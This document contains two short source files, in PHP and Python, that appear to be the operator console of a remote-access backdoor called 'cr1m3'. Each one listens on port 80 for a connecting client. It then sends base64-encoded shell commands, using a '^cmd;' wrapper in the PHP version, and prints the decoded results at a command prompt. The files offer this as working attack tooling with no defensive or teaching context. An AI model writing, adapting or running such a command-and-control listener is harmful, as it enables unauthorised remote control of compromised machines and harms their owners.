File: clients/cr1m3_client.php
<?php
	$LOCAL_HOST = "127.0.0.1";
	$LOCAL_PORT = 80;


	if(($sock = socket_create(AF_INET, SOCK_STREAM,SOL_TCP))==FALSE) {
		echo("Error on create socket...\n");
		exit(1);
	}


	if (!socket_set_option($sock, SOL_SOCKET, SO_REUSEADDR, 1)) {
	    echo socket_strerror(socket_last_error($sock));
	    exit;
	}


	if(socket_bind($sock, $LOCAL_HOST, $LOCAL_PORT)==FALSE) {
		echo("Error on bind...\n");
		exit(1); 
	}

	if(socket_listen($sock,5)==FALSE) {
		echo("Error on listen...\n");
		exit(1);
	}

	echo("Listening on port [" . $LOCAL_PORT . "]\n");

	if(($client=socket_accept($sock))==FALSE) {
		echo("Error on accept");
		socket_close(sock);
		exit(1);
	}

	stream_set_timeout($sock,1,0);

	while(1) {
		fflush(STDIN);
		fflush(STDOUT);

		echo("cr1m3~> ");
		$line = trim(fgets(STDIN));
		//echo("LINE: " . $line . "\n");

		if($line[0]!='^')
			$line = "^cmd;" . $line . ";dasdasdasd";

		$encoded = base64_encode($line);
		socket_send($client,$encoded,strlen($encoded),0);
		socket_recv($client,$input,2048,0);
		echo(base64_decode(trim($input)) . "\n");

	}	

	echo("bye bye!\n");

?>

File: clients/cr1m3_client.py
import socket
import sys
import base64

if __name__ == "__main__":
	MAX_BUFF =  347*347*2
	PORT = 80

	server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	# this has no effect, why ?
	server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	server_socket.bind(("0.0.0.0", PORT))
	server_socket.listen(10)

	print "Cr1m3 Server started on port (" + str(PORT) + ")"
	print "Listening client..."
	sockfd, addr = server_socket.accept()
	print "Client connected"
	print "\n\n"

#	sys.stderr.write("command> ")
	sys.stdout.write("command>\x20\x20")

	while 1:
		b=sys.stdin.readline()
		b = b.rstrip()
		if len(b) != 0:
			print("command>\x20\x20",b)
		 	sockfd.send(base64.b64encode(b))
			a = sockfd.recv(MAX_BUFF)
			if len(a) >= 2:
				print base64.b64decode(a)
			
			a = ""
			sys.stdout.write("command>")
		
